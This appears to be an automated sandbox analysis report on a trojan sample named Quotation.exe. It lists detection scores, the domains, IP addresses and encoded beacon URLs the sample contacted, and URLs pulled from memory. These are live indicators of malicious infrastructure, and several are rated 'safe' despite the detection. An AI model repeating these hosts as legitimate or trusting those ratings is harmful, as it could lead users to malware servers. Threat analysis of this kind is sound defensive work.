            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Quotation.exe37%ReversingLabsWin32.Trojan.AutoitInject
            Quotation.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.smartcongress.net/11t3/0%Avira URL Cloudsafe
            http://www.mrpokrovskii.pro/2pji/?GzeXFT7=67iA4TPPdQ9nEroy4uzQwLjmbdlqhQsEvI1Cgt9ewFwChBdA65DXjWpTSdFtRBveCaF8GV/HBCb4pJoPY3YT7wZt3N4B7jiHnWlWePCYt+UXdYLjL0ZgeX4=&aJZ=OnOxa0A0n0BXj00%Avira URL Cloudsafe
            http://www.matteicapital.online/hyyd/?aJZ=OnOxa0A0n0BXj0&GzeXFT7=fqlLWWUWU+rKW3Ee0UVO0B/wSDzUS5U2hpWkksgzCQayp6WkBROPj8SoyGxHGehCRFG0wA/ATtWP72Uz33qXwTX1CxmsRTufMD7rgZabFSEYAFPL6HYYC58=0%Avira URL Cloudsafe
            http://www.3kw40881107247y.click/6wln/0%Avira URL Cloudsafe
            http://www.llljjjiii.shop/rsvy/?GzeXFT7=r8TqL8lVmKhCyKgitQBFywHntQnNTxsH+3nLHstVk9be2gQWJEXa9NKMMz87e0tjGxvoPEvy6SLnfdtsmt5rXvvnrxwIlwzliiyA/L7dY/WJb14Y701b98g=&aJZ=OnOxa0A0n0BXj00%Avira URL Cloudsafe
            http://www.70kdd.top/klhq/?GzeXFT7=AHY/rhT5FAaHaOQvyjmolPV0Gci6vpbrO2rEekNoUo4JX0G52JlH+4AuLBXgGUSDwTLgniL6s02sZcl+Gf8+kcDBiU8NkZcujbIB4aDN0RaZvptmL2rjFAE=&aJZ=OnOxa0A0n0BXj00%Avira URL Cloudsafe
            http://www.questmatch.pro/z3ox/0%Avira URL Cloudsafe
            http://www.matteicapital.online/Funds.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimxwvd0%Avira URL Cloudsafe
            http://www.bser101pp.buzz/crrp/?GzeXFT7=upjfZKq4/ZGfoF/MvQQxhfVT264zV9bCPxdbSO05fQ4zSiP5+UGAxJqZOtAYqZWCOef+BeM6z+3JdRqWgtx/nGZJ+pHk7Nqqe9OIf3jZd8YCzRO5KH2eHFc=&aJZ=OnOxa0A0n0BXj00%Avira URL Cloudsafe
            http://www.ampsamkok88.shop/huvt/?aJZ=OnOxa0A0n0BXj0&GzeXFT7=yxXU4HpAbhaf+Ok3Aej6zxGwiCQCqWNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPbkXZZc5h44QYxsw3x5GAutS7NMZYCP3hSt0=0%Avira URL Cloudsafe
            http://www.gogawithme.live/6gtt/?GzeXFT7=SGA0vAB7ljjiJZB705auu5nMqwjvdcjZK6uCbLTCC3HP5ur0cn6Abe6/hzp/g4dh4YOAUYGeqr6sPYYs6bnbZvGne3nysZQrZ3blxXWxNHaQaYJ6iy4iy6k=&aJZ=OnOxa0A0n0BXj00%Avira URL Cloudsafe
            http://www.ytsd88.top/egqi/?GzeXFT7=b73RclDzsQx9LNfKXEn0LSRo1QZueGUUZl7U/15lM3StUAJAIINJCW5I+z7gQYXdXqIUVixe3UGJ61mgF9Q8iuZq94lDlsrAFGhvrGfR3NsOl2e42KNKrIU=&aJZ=OnOxa0A0n0BXj00%Avira URL Cloudsafe
            http://www.mrpokrovskii.pro/2pji/0%Avira URL Cloudsafe
            http://www.acond-22-mvr.click/w9z4/?GzeXFT7=68uIQ7XuXrYyzH3jGwxTrPeynRmH3PyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfdceGGDC9QtpScRVRYhm/IS5VlT3jRiR+euo=&aJZ=OnOxa0A0n0BXj0100%Avira URL Cloudmalware
            http://www.matteicapital.online/Capital.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimxw0%Avira URL Cloudsafe
            http://www.3kw40881107247y.click/6wln/?aJZ=OnOxa0A0n0BXj0&GzeXFT7=gk6EUi6sTSAX9bdw0FF5qpRAaiCMK60Ih0859QLLBHNHxoVqcUaJ5GMhXvTh6fdanKOBrZcLB2201dVdXc1CFZPk2QWw1QtBA7h//Mif1prUBHwa19uPi+o=0%Avira URL Cloudsafe
            http://www.canadavinreport.site/cvhb/?GzeXFT7=eb9ahS5GFYDOhq0WWSJwR0pgVyjGk3ZRXDTXF/EDnGWOAiF9jJHx+uvzEaHIq78+HHS43fAza3sJA+7AAuSe3+c8RKpZ8QdwyK2YX5FHCjlm36TVHFBRCwU=&aJZ=OnOxa0A0n0BXj00%Avira URL Cloudsafe
            http://www.matteicapital.online/Home_Equity_Rates.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP0%Avira URL Cloudsafe
            http://www.questmatch.pro/z3ox/?GzeXFT7=XRVN9XS8GrL3N+/zP5xupTrPTPxZEWj65QayKB69AEGBKWegVMYG7P4Sa4h2i8A2rJx8M9mN63brSxfD4lNhTkfYyaZjFsNsjC0F7uv9kyVhrOa9L+DA6gc=&aJZ=OnOxa0A0n0BXj00%Avira URL Cloudsafe
            http://www.70kdd.top/klhq/0%Avira URL Cloudsafe
            http://www.matteicapital.online/Interest.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimx0%Avira URL Cloudsafe
            http://www.bser101pp.buzz/crrp/0%Avira URL Cloudsafe
            http://www.llljjjiii.shop/rsvy/0%Avira URL Cloudsafe
            http://www.smartcongress.net/11t3/?GzeXFT7=BoXQYlgPFtFW2+QFcsMkz8ZnQyv1gPD9OGXhxFZv9pg5w5kxRGgY33EbCKURTw9NMXrcECQepab13HCWL01336IGNy75YpYvoXliURpgNXuxXH/BaJU0H7s=&aJZ=OnOxa0A0n0BXj00%Avira URL Cloudsafe
            http://www.rtpterbaruwaktu3.xyz/7yx4/?aJZ=OnOxa0A0n0BXj0&GzeXFT7=m5A4fx9ZIvMjycGTXvyw9uJmE8MC06yi7dKiWry0Mz65334dxjvJlwP/oWrLHd67Yf3RW+voxQmVQwC1SSJQczXh8T6WPeXIwty/TEDOHxdjdmbI+7yKQjQ=0%Avira URL Cloudsafe
            http://www.canadavinreport.site/cvhb/?GzeXFT7=eb9ahS5GFYDOhq0WWSJwR0pgVyjGk3ZRXDTXF/EDnGWOAiF9jJHx0%Avira URL Cloudsafe
            http://www.ampsamkok88.shop/huvt/0%Avira URL Cloudsafe
            http://www.3kw40881107247y.click0%Avira URL Cloudsafe
            http://www.matteicapital.online/__media__/js/trademark.php?d=matteicapital.online&type=ns0%Avira URL Cloudsafe
            http://www.matteicapital.online/Angel_Investors.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1S0%Avira URL Cloudsafe
            http://www.acond-22-mvr.click/w9z4/100%Avira URL Cloudmalware
            http://www.gogawithme.live/6gtt/0%Avira URL Cloudsafe
            http://www.ytsd88.top/egqi/0%Avira URL Cloudsafe
            http://www.Matteicapital.online0%Avira URL Cloudsafe
            http://www.54248711.xyz/jm2l/?aJZ=OnOxa0A0n0BXj0&GzeXFT7=M21ir/NSFfGrmB4sne/SCCGX/e/txCX4RaXyCSFwSSwtaZs5yH0UEptpPba+9Px3pipv0aZDZRRy+Xo/jJmyn/BAme0mP+U7kiozXG5r1hn7yWn0dKNvWy4=0%Avira URL Cloudsafe
            http://www.canadavinreport.site/cvhb/0%Avira URL Cloudsafe
            http://www.54248711.xyz/jm2l/0%Avira URL Cloudsafe
            http://www.matteicapital.online/hyyd/0%Avira URL Cloudsafe
            http://www.matteicapital.online/__media__/design/underconstructionnotice.php?d=matteicapital.online0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.llljjjiii.shop
            		8.210.114.150
            		truefalse
              		unknown
              www.ampsamkok88.shop
              		172.67.209.48
              		truefalse
                		unknown
                www.54248711.xyz
                		161.97.142.144
                		truetrue
                  		unknown
                  www.gogawithme.live
                  		209.74.77.109
                  		truefalse
                    		unknown
                    www.7261ltajbc.bond
                    		154.12.28.184
                    		truefalse
                      		unknown
                      www.canadavinreport.site
                      		185.27.134.206
                      		truefalse
                        		unknown
                        www.3kw40881107247y.click
                        		172.67.192.207
                        		truefalse
                          		unknown
                          www.questmatch.pro
                          		172.67.138.37
                          		truefalse
                            		unknown
                            www.acond-22-mvr.click
                            		199.59.243.227
                            		truefalse
                              		unknown
                              www.mrpokrovskii.pro
                              		194.85.61.76
                              		truefalse
                                		unknown
                                smartcongress.net
                                		146.88.233.115
                                		truefalse
                                  		unknown
                                  www.matteicapital.online
                                  		208.91.197.27
                                  		truefalse
                                    		unknown
                                    70kdd.top
                                    		38.47.232.124
                                    		truefalse
                                      		unknown
                                      www.bser101pp.buzz
                                      		104.21.58.90
                                      		truefalse
                                        		unknown
                                        www.ytsd88.top
                                        		47.76.213.197
                                        		truefalse
                                          		unknown
                                          rtpterbaruwaktu3.xyz
                                          		103.21.221.87
                                          		truetrue
                                            		unknown
                                            www.70kdd.top
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.rtpterbaruwaktu3.xyz
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.smartcongress.net
                                                		unknown
                                                		unknownfalse
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.mrpokrovskii.pro/2pji/?GzeXFT7=67iA4TPPdQ9nEroy4uzQwLjmbdlqhQsEvI1Cgt9ewFwChBdA65DXjWpTSdFtRBveCaF8GV/HBCb4pJoPY3YT7wZt3N4B7jiHnWlWePCYt+UXdYLjL0ZgeX4=&aJZ=OnOxa0A0n0BXj0false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.3kw40881107247y.click/6wln/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.ampsamkok88.shop/huvt/?aJZ=OnOxa0A0n0BXj0&GzeXFT7=yxXU4HpAbhaf+Ok3Aej6zxGwiCQCqWNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPbkXZZc5h44QYxsw3x5GAutS7NMZYCP3hSt0=false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.70kdd.top/klhq/?GzeXFT7=AHY/rhT5FAaHaOQvyjmolPV0Gci6vpbrO2rEekNoUo4JX0G52JlH+4AuLBXgGUSDwTLgniL6s02sZcl+Gf8+kcDBiU8NkZcujbIB4aDN0RaZvptmL2rjFAE=&aJZ=OnOxa0A0n0BXj0false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.questmatch.pro/z3ox/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.bser101pp.buzz/crrp/?GzeXFT7=upjfZKq4/ZGfoF/MvQQxhfVT264zV9bCPxdbSO05fQ4zSiP5+UGAxJqZOtAYqZWCOef+BeM6z+3JdRqWgtx/nGZJ+pHk7Nqqe9OIf3jZd8YCzRO5KH2eHFc=&aJZ=OnOxa0A0n0BXj0false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.matteicapital.online/hyyd/?aJZ=OnOxa0A0n0BXj0&GzeXFT7=fqlLWWUWU+rKW3Ee0UVO0B/wSDzUS5U2hpWkksgzCQayp6WkBROPj8SoyGxHGehCRFG0wA/ATtWP72Uz33qXwTX1CxmsRTufMD7rgZabFSEYAFPL6HYYC58=false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.smartcongress.net/11t3/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.llljjjiii.shop/rsvy/?GzeXFT7=r8TqL8lVmKhCyKgitQBFywHntQnNTxsH+3nLHstVk9be2gQWJEXa9NKMMz87e0tjGxvoPEvy6SLnfdtsmt5rXvvnrxwIlwzliiyA/L7dY/WJb14Y701b98g=&aJZ=OnOxa0A0n0BXj0false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.gogawithme.live/6gtt/?GzeXFT7=SGA0vAB7ljjiJZB705auu5nMqwjvdcjZK6uCbLTCC3HP5ur0cn6Abe6/hzp/g4dh4YOAUYGeqr6sPYYs6bnbZvGne3nysZQrZ3blxXWxNHaQaYJ6iy4iy6k=&aJZ=OnOxa0A0n0BXj0false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.ytsd88.top/egqi/?GzeXFT7=b73RclDzsQx9LNfKXEn0LSRo1QZueGUUZl7U/15lM3StUAJAIINJCW5I+z7gQYXdXqIUVixe3UGJ61mgF9Q8iuZq94lDlsrAFGhvrGfR3NsOl2e42KNKrIU=&aJZ=OnOxa0A0n0BXj0false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.acond-22-mvr.click/w9z4/?GzeXFT7=68uIQ7XuXrYyzH3jGwxTrPeynRmH3PyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfdceGGDC9QtpScRVRYhm/IS5VlT3jRiR+euo=&aJZ=OnOxa0A0n0BXj0false
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.questmatch.pro/z3ox/?GzeXFT7=XRVN9XS8GrL3N+/zP5xupTrPTPxZEWj65QayKB69AEGBKWegVMYG7P4Sa4h2i8A2rJx8M9mN63brSxfD4lNhTkfYyaZjFsNsjC0F7uv9kyVhrOa9L+DA6gc=&aJZ=OnOxa0A0n0BXj0false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.3kw40881107247y.click/6wln/?aJZ=OnOxa0A0n0BXj0&GzeXFT7=gk6EUi6sTSAX9bdw0FF5qpRAaiCMK60Ih0859QLLBHNHxoVqcUaJ5GMhXvTh6fdanKOBrZcLB2201dVdXc1CFZPk2QWw1QtBA7h//Mif1prUBHwa19uPi+o=false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.canadavinreport.site/cvhb/?GzeXFT7=eb9ahS5GFYDOhq0WWSJwR0pgVyjGk3ZRXDTXF/EDnGWOAiF9jJHx+uvzEaHIq78+HHS43fAza3sJA+7AAuSe3+c8RKpZ8QdwyK2YX5FHCjlm36TVHFBRCwU=&aJZ=OnOxa0A0n0BXj0false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.mrpokrovskii.pro/2pji/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.70kdd.top/klhq/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.bser101pp.buzz/crrp/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.acond-22-mvr.click/w9z4/false
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.llljjjiii.shop/rsvy/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.smartcongress.net/11t3/?GzeXFT7=BoXQYlgPFtFW2+QFcsMkz8ZnQyv1gPD9OGXhxFZv9pg5w5kxRGgY33EbCKURTw9NMXrcECQepab13HCWL01336IGNy75YpYvoXliURpgNXuxXH/BaJU0H7s=&aJZ=OnOxa0A0n0BXj0false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.rtpterbaruwaktu3.xyz/7yx4/?aJZ=OnOxa0A0n0BXj0&GzeXFT7=m5A4fx9ZIvMjycGTXvyw9uJmE8MC06yi7dKiWry0Mz65334dxjvJlwP/oWrLHd67Yf3RW+voxQmVQwC1SSJQczXh8T6WPeXIwty/TEDOHxdjdmbI+7yKQjQ=false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.ampsamkok88.shop/huvt/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.gogawithme.live/6gtt/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.ytsd88.top/egqi/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.54248711.xyz/jm2l/?aJZ=OnOxa0A0n0BXj0&GzeXFT7=M21ir/NSFfGrmB4sne/SCCGX/e/txCX4RaXyCSFwSSwtaZs5yH0UEptpPba+9Px3pipv0aZDZRRy+Xo/jJmyn/BAme0mP+U7kiozXG5r1hn7yWn0dKNvWy4=false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.canadavinreport.site/cvhb/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.54248711.xyz/jm2l/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.matteicapital.online/hyyd/false
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://duckduckgo.com/chrome_newtabpcaui.exe, 00000003.00000002.4156818268.0000000007A2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixpcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      		high
                                                      https://dts.gnpge.comiEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/ac/?q=pcaui.exe, 00000003.00000002.4156818268.0000000007A2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://i1.cdn-image.com/__media__/pics/29590/bg1.png)pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://cdn.consentmanager.netpcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		high
                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		high
                                                                http://www.matteicapital.online/Funds.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimxwvdpcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=pcaui.exe, 00000003.00000002.4156818268.0000000007A2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.bt.cn/?from=404pcaui.exe, 00000003.00000002.4154775790.0000000005B5E000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.000000000404E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularpcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgpcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.google.compcaui.exe, 00000003.00000002.4154775790.00000000056A8000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotpcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfpcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixpcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.matteicapital.online/Capital.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimxwpcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchpcaui.exe, 00000003.00000002.4156818268.0000000007A2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfpcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://i1.cdn-image.com/__media__/pics/28903/search.png)pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldpcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://i1.cdn-image.com/__media__/pics/28905/arrrow.png)pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.matteicapital.online/Home_Equity_Rates.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BPpcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://delivery.consentmanager.netpcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://i1.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgpcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotpcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.matteicapital.online/Interest.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimxpcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=pcaui.exe, 00000003.00000002.4156818268.0000000007A2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.ecosia.org/newtab/pcaui.exe, 00000003.00000002.4156818268.0000000007A2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.matteicapital.online/__media__/js/trademark.php?d=matteicapital.online&type=nspcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://ac.ecosia.org/autocomplete?q=pcaui.exe, 00000003.00000002.4156818268.0000000007A2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffpcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.canadavinreport.site/cvhb/?GzeXFT7=eb9ahS5GFYDOhq0WWSJwR0pgVyjGk3ZRXDTXF/EDnGWOAiF9jJHxpcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.00000000064CA000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000049BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
